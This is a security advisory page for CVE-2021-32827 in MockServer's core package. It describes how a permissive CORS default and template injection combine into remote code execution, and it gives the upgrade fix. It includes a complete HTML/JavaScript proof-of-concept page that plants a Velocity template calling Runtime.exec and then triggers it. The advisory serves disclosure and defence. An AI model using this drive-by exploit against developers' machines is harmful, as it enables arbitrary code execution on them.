Homepage

Arbitrary Code Execution Affecting org.mock-server:mockserver-core package, versions [,5.13.0)

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.37% (73rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGMOCKSERVER-1566476
  • published17 Aug 2021
  • disclosed17 Aug 2021
  • creditAlvaro Muñoz
Report a new vulnerability Found a mistake?

Introduced: 17 Aug 2021

CVE-2021-32827  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade org.mock-server:mockserver-core to version 5.13.0 or higher.

Overview

org.mock-server:mockserver-core is a Functionality used by all MockServer modules for matching and expectations

Affected versions of this package are vulnerable to Arbitrary Code Execution. An attacker that can trick a victim into visiting a malicious site while running MockServer locally, and then will be able to run arbitrary code on the MockServer machine.

MockServer with an overly broad default CORS configuration allows any site to send cross-site requests, which may allow sending requests to the REST API. In addition, MockServer allows creating dynamic expectations using Javascript or Velocity templates, which allow for script injection.

These two issues combined allow an attacker to serve a malicious page to a developer running MockServer.

PoC:

<html>
<head>
  <script type="text/javascript">
    (function() {
      console.log("[+] Creating Expectation")
      fetch('http://localhost:1080/mockserver/expectation', {
        method: 'PUT',
        body: JSON.stringify({
          "httpRequest": {
            "path": "/pwn/me",
            "queryStringParameters": {"cmd": [".*"]}
            //"queryStringParameters": {"script": [".*"]}
          },
          "httpResponseTemplate": {
            "template": "{ \"statusCode\": 200, \"body\": \"$!request.class.forName('java.lang.Runtime').getRuntime().exec($!request.queryStringParameters.cmd[0])\" }",
            "templateType": "VELOCITY"
            //"template": "return { statusCode: 200, body: String(this.engine.factory.scriptEngine.eval(request.queryStringParameters.script[0])) };",
            //"templateType": "JAVASCRIPT"
          }
        })
      }).then(function(response) {
        response.text().then(function (text) {
          console.log("PUT", text)
        });
      }).catch((error) => {
        console.error('Error:', error);
      });


  setTimeout(function() {
    console.log(&quot;[+] Triggering exploit&quot;)
    var url = &#39;http://localhost:1080/pwn/me?cmd=&#39; + encodeURIComponent(&#39;touch /tmp/pwned&#39;)
    //var url = &#39;http://localhost:1080/pwn/me?script=&#39; + encodeURIComponent(&#39;java.lang.Runtime.getRuntime().exec(&quot;touch /tmp/pwned&quot;)&#39;)
    fetch(url, {
      mode: &#39;no-cors&#39;
    }).then(function(response) {
      response.text().then(function (text) {
        console.log(&quot;GET&quot;, text)
      });
    }).catch((error) =&gt; {
      console.error(&#39;Error:&#39;, error);
    });
  }, 1000)
})();



  </script>
</head>
<body>
</body>
</html>

CVSS Scores

version 3.1